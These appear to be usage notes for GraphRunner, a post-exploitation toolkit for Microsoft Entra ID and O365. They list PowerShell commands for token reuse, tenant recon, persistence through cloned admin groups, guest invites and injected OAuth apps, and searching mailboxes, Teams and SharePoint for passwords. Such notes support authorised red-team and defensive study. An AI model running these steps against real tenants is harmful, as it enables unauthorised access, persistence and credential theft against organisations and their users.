Graphrunner

description

• post-exploitation toolset for microsoft entra ID / o365
• baesd upon microsoft graph API

installation

• https://github.com/dafthack/GraphRunner

PS> Import-Module .\GraphRunner.ps1
PS> Get-GraphTokens

usage

authentication

• reuse authenticated tokens
• device code or user creds
• azure app auth

# should also set $tokens
PS> Get-GraphTokens

recon and enumeration

• gather apps and consent approvals
• dump conditional access policies
• user/groups/sharepoint sites

PS> Invoke-GraphRecon
PS> Invoke-DumpCAPS -Tokens $tokens
PS> Invoke-DumpApps
 
# check if you can access other email adresses
PS> Invoke-GraphOpenInboxFinder -Tokens $tokens -userlist .\users.txt
 
# check if you can join any group
PS> Get-UpdatableGroups -Tokens $tokens
PS> Invoke-AddGroupMemer -Tokens $token -GroupId id -userId user-id
 
# dynamic groups
PS> Get-DynamicGroups -Tokens $tokens

persistence

• default ability to
  • create groups
  • invite guests
  • create apps

# clone a group with a name, copy other users to that, add your own user to it
# do this with 'adminitrators', 'site-admins'
PS> Invoke-SecurityGroupCloner
 
# guest users
PS> Invoke-InviteGuest
 
# oauth app
PS> Invoke-InjectOAuthApp
 
# will create an $apptoken
PS> Invoke-GraphOpenInboxFinder -Tokens $apptokens -userlist .\userlist.txt
PS> Get-Inbox -Tokens $apptokens ...

Pillage

PS> Invoke-SearchMailbox -Tokens $tokens -SearchTerm "search term"
PS> Invoke-SearchTeams ..
PS> Invoke-SearchUserAttributes -Tokens $tokens -SearchTerm password
PS> Invoke-SearchSharePointAndOneDrive -Tokens $tokens -SearchTerm "password* and filetype:txt"
PS> Invoke-ImmersiveFileReader

Automate Stuff

PS> Invoke-GraphRunner

There is also a GUI

• just a simple HTML site that can be opened with a browser

references

• Cloud Cheat Sheet
• GitHub Repo
• Introduction youtube
• Introduction blog post